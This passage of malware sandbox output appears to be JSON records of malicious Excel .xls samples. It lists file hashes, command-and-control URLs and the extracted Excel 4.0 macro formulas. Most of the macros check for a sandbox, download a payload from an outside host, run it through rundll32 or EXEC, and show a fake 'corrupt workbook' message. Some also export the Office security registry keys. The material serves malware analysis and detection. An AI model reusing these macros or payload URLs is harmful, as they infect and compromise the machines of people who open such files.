Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ywPXZzEnW2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7912f05995a0819bb5d3969e157b50e43acfa86b64e4ca2e3ba77b106ed1b865"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"7912f05995a0819bb5d3969e157b50e43acfa86b64e4ca2e3ba77b106ed1b865","filesize":132608,"md5":"726398315e54024257fe7a7433483646","sha1":"c6909e9381e479b9fa47a4ea3b38836e7c0ed7cf","sha256":"7912f05995a0819bb5d3969e157b50e43acfa86b64e4ca2e3ba77b106ed1b865","sha512":"8a3ae8759bb4ec6c46892bd0c16ee5c95cf0af540d9d8b7a54a86c55797f0aa9cd1a7ef0cba897d013393c8f42a568709402a8aed8489d65f02c00b8a1f4f717","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7912f05995a0819bb5d3969e157b50e43acfa86b64e4ca2e3ba77b106ed1b865.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"n9l8WupIWf\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79336efa1e5816bce88505acf565cad3f53a3b7894f922dc13ff6f11e7ce213b"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"79336efa1e5816bce88505acf565cad3f53a3b7894f922dc13ff6f11e7ce213b","filesize":177152,"md5":"ef3650b21f17dd7c0429ed172a9833d6","sha1":"c43f4ba63cd93782e7b4083e83f9208ba5453e20","sha256":"79336efa1e5816bce88505acf565cad3f53a3b7894f922dc13ff6f11e7ce213b","sha512":"3c3630f62079941763db4b01748173de3374b7ad3e85691cf5b13d175b47e23d4815affd684a9bf5b33ddaf0c7df3944b2345355f55eace2bc201c04b00dde8a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79336efa1e5816bce88505acf565cad3f53a3b7894f922dc13ff6f11e7ce213b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rpjwsHtirL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7946e8d3e2dea41ea184b0387fad24975504ef60518d54bf3d065a725fb3b3a4"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"7946e8d3e2dea41ea184b0387fad24975504ef60518d54bf3d065a725fb3b3a4","filesize":185344,"md5":"8c550b9f8b30d0ca9f38a24ceddb5d8e","sha1":"3de8186e164ad2a6e1f1f7e6bef430378ac7d2e6","sha256":"7946e8d3e2dea41ea184b0387fad24975504ef60518d54bf3d065a725fb3b3a4","sha512":"f851d54f139f640357dc5547565b5c4ff7b09ba322b6c55f151f20453dce75e438d99bef86d1eafe5deeab8e0023c42829ff1c5ad0928d7344c08df725d5ab2c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7946e8d3e2dea41ea184b0387fad24975504ef60518d54bf3d065a725fb3b3a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7961607ad249d4dd7f5d6ad4b402219363c79595d96e03d5e849b196deb51e72"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"7961607ad249d4dd7f5d6ad4b402219363c79595d96e03d5e849b196deb51e72","filesize":109568,"md5":"f9e3dff2c1af08b57cd4f5dd4a00c774","sha1":"75803643d38deae06364788a38026b8cc6b43a69","sha256":"7961607ad249d4dd7f5d6ad4b402219363c79595d96e03d5e849b196deb51e72","sha512":"18322b9c3ae0340d2c148333fa4d8442377a0b325d3513edec75963874fecf2647936cc9fc091227b8fa6f1b8c2a9daa81d549f9e09f7c2c2b5c5047d29f0915","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7961607ad249d4dd7f5d6ad4b402219363c79595d96e03d5e849b196deb51e72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"EXTSbBOiW5\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"797bdb8d08a0d87b69e9c38ab9a46f6437dcf1daa7125add0a1cd568f364ca12"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"797bdb8d08a0d87b69e9c38ab9a46f6437dcf1daa7125add0a1cd568f364ca12","filesize":168960,"md5":"8695f89716ab5c250e501e44a6ff5ebf","sha1":"7573c4c189585a1e6ef03ac9aca36249a6c6a677","sha256":"797bdb8d08a0d87b69e9c38ab9a46f6437dcf1daa7125add0a1cd568f364ca12","sha512":"c3b8bfa8da3b725c484f6953b76c2c7b44598b38983bba8283c3bf990f270a8bcd660e38033225137d6003114a1251bd7d00d86fa9963594c2d9122be818769d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"797bdb8d08a0d87b69e9c38ab9a46f6437dcf1daa7125add0a1cd568f364ca12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8J3CI3eIke\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"798c30e9ec630c0a286b379ef6472c4012b9785ab03e6513de4edd2a2fe47fa3"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"798c30e9ec630c0a286b379ef6472c4012b9785ab03e6513de4edd2a2fe47fa3","filesize":112640,"md5":"fba8bdca68e6ac3d958de0adeb384d8f","sha1":"f8e87b49b8a4b4f644c0bb00e0c3283dc7e8f822","sha256":"798c30e9ec630c0a286b379ef6472c4012b9785ab03e6513de4edd2a2fe47fa3","sha512":"0b0dd344bc88d614c4ff7a35b818572b38a1fbef691d981619dbba3e6bd3f372352c060e266f26d2c22225bbdac1de2cb6de0f386ac6d1406fc5c96b2de29a88","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"798c30e9ec630c0a286b379ef6472c4012b9785ab03e6513de4edd2a2fe47fa3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"799117dd76ddb6b09f6077947349771fae5858a6848a2499c15e496728969d6d"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"799117dd76ddb6b09f6077947349771fae5858a6848a2499c15e496728969d6d","filesize":182784,"md5":"795e79fc9c64f525796fd334ba3644a0","sha1":"34ca8f7c078673dd55ebe6c6d2f97088dfa7e740","sha256":"799117dd76ddb6b09f6077947349771fae5858a6848a2499c15e496728969d6d","sha512":"bcc364369564534c7f16b183e613a0c6c8390ad307d180b6850bb3d2ca4f5be6a2bb43ed3b34a5fa45246aabe876754f6b7a914cff3c6432c6d8251a2e10ebde","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"799117dd76ddb6b09f6077947349771fae5858a6848a2499c15e496728969d6d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7993ecf84b5c90a07b5f73d50dde428cb8e276096fec68506214b207d60ee688"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"7993ecf84b5c90a07b5f73d50dde428cb8e276096fec68506214b207d60ee688","filesize":206336,"md5":"59e65c0a2aea22e65ee46fce5100f874","sha1":"d82db7ffb9ccfd494c4f3c26537dbc7b46da7d16","sha256":"7993ecf84b5c90a07b5f73d50dde428cb8e276096fec68506214b207d60ee688","sha512":"928cf3a97bc385e0b38dbe078940ed57c1bd41c0df11ec6822beff6c0cd7572e6ab79fd7d9f73a475b1baf53da2186b92a394a550f2e6146f7094e5152ad5176","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7993ecf84b5c90a07b5f73d50dde428cb8e276096fec68506214b207d60ee688.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ni0EzE1xTE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79a264110d8939259551ed3743cc24ae25430d629ff9784068a634374f3a4354"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79a264110d8939259551ed3743cc24ae25430d629ff9784068a634374f3a4354","filesize":167936,"md5":"6c3f756ac282b976a93d693420e1d3a0","sha1":"7675ae8e1f147f73e8668db394ed9f37a2b473d7","sha256":"79a264110d8939259551ed3743cc24ae25430d629ff9784068a634374f3a4354","sha512":"e30bcaf9fb04da9ba988d9c1b61d7240e2281afa34590db36e625513ced405e68d84486afc2786483da0e8df158969cf3e6f808ada895ae0aac9e8dbd4dc9dd9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79a264110d8939259551ed3743cc24ae25430d629ff9784068a634374f3a4354.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dAAGmVusKu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79bbea6627f4ab6308a337860a9a520b89f67241d66bd6216370ee5314a7e973"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79bbea6627f4ab6308a337860a9a520b89f67241d66bd6216370ee5314a7e973","filesize":221184,"md5":"6d616e404dccb0557e0c9c9495acc643","sha1":"838f96f90f4a79e9526bf9f8271f8d554c6d28be","sha256":"79bbea6627f4ab6308a337860a9a520b89f67241d66bd6216370ee5314a7e973","sha512":"babc51e19f2b7c1c1765a748bbb958f43045928d4b5296d197e4f82768f01093a14d1a7ed955566e1d5cc921d05c09fd0280fd687ea60cb3b7336feb8ebeb408","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79bbea6627f4ab6308a337860a9a520b89f67241d66bd6216370ee5314a7e973.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"45rxbJs7BL\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79bc69da2b72e63fba03d9c5b0fdebf228c589587db949b1aa271eb7a1b6c962"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79bc69da2b72e63fba03d9c5b0fdebf228c589587db949b1aa271eb7a1b6c962","filesize":167936,"md5":"5b98978aadf13b2a4bb24ab9a097acb3","sha1":"978134d78376bd9583dfd4a4e46bb9a787b152d7","sha256":"79bc69da2b72e63fba03d9c5b0fdebf228c589587db949b1aa271eb7a1b6c962","sha512":"e56cd2eb6121e1ea766b2d2e32201da8ada705e0502adf374bea018c1428dcedec5f1da03681ae74dafe2f8eea99e6eee328a6c0ae72285688a1599757877670","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79bc69da2b72e63fba03d9c5b0fdebf228c589587db949b1aa271eb7a1b6c962.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8ImPNk0mB8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79c4f202aaba2eac81a015a02fcd62cb78f3e6cb3b6b72548fbc72a66d617428"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79c4f202aaba2eac81a015a02fcd62cb78f3e6cb3b6b72548fbc72a66d617428","filesize":142848,"md5":"477ad0a88d79d4a853ebb5f283f6ee00","sha1":"9eb74995c04e54c249df2ce83667edd6531e06a4","sha256":"79c4f202aaba2eac81a015a02fcd62cb78f3e6cb3b6b72548fbc72a66d617428","sha512":"22f9ce6a35ef89914bbe27e7fbc9d6d13e6e7c7f25a9418b4c9e8dcbc3830cd141b1f2e17c44a2ce1d6d18937994caeeb0393a3dde3a6fc2b53fd3dbe48c7e96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79c4f202aaba2eac81a015a02fcd62cb78f3e6cb3b6b72548fbc72a66d617428.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"7XXyHLnhzF\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79c75f41e22b9ce9d1ed656fae6c9b1cc1b00830e77ec895208596c8c5299040"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79c75f41e22b9ce9d1ed656fae6c9b1cc1b00830e77ec895208596c8c5299040","filesize":152576,"md5":"8c7f2452e760cfae7fd5b750be2466dc","sha1":"11baebefad68be3ed74eb0312aad3c2df9652f2e","sha256":"79c75f41e22b9ce9d1ed656fae6c9b1cc1b00830e77ec895208596c8c5299040","sha512":"19f79f083b6f9923b540d0c44cbf087513d46f4f3bc2237baabfbee7e54974f324fa6dc11755d683491191caff7255502ea36ad95fd2de88cce259cefce40a8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79c75f41e22b9ce9d1ed656fae6c9b1cc1b00830e77ec895208596c8c5299040.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KMiClfiLoP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79d532d75df7bd8312b30c48cb97be45ce14cb3de7225142e3a6871101ebc68e"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79d532d75df7bd8312b30c48cb97be45ce14cb3de7225142e3a6871101ebc68e","filesize":171008,"md5":"48240ee59a843ade7078c430399ae009","sha1":"00f9cd94bc5b6a0c3c5e94023109e96e55cc5a99","sha256":"79d532d75df7bd8312b30c48cb97be45ce14cb3de7225142e3a6871101ebc68e","sha512":"25266488245b8faee3c1b2caa15d04abb63c3ab72a91b3559cd49c365fe09f0d15e04837750151e2a2a9d6284f995466caf2d68b36a4a8c5fed2d20367369ec0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79d532d75df7bd8312b30c48cb97be45ce14cb3de7225142e3a6871101ebc68e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bB3bMt5IsK\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"79d593650994ceb52d8fdf64dcae6ec9c13d201eb939379b826f918130f80082"},"analysis":{"reported":"2020-04-09T16:17:12Z","score":10},"files":[{"filename":"79d593650994ceb52d8fdf64dcae6ec9c13d201eb939379b826f918130f80082","filesize":225280,"md5":"36817144665c3cab9b0dbbc4ee1e2235","sha1":"220139134165dc8102e36374a782e0917b29a723","sha256":"79d593650994ceb52d8fdf64dcae6ec9c13d201eb939379b826f918130f80082","sha512":"dfbc95f01bd1d45e84fff88d3008420ae2d2166b41056269fea759aae510b0565468aff3529b9e267034ec8414cfc66a90efc68acae119d6fe84efe6e0276523","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"79d593650994ceb52d8fdf64dcae6ec9c13d201eb939379b826f918130f80082.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 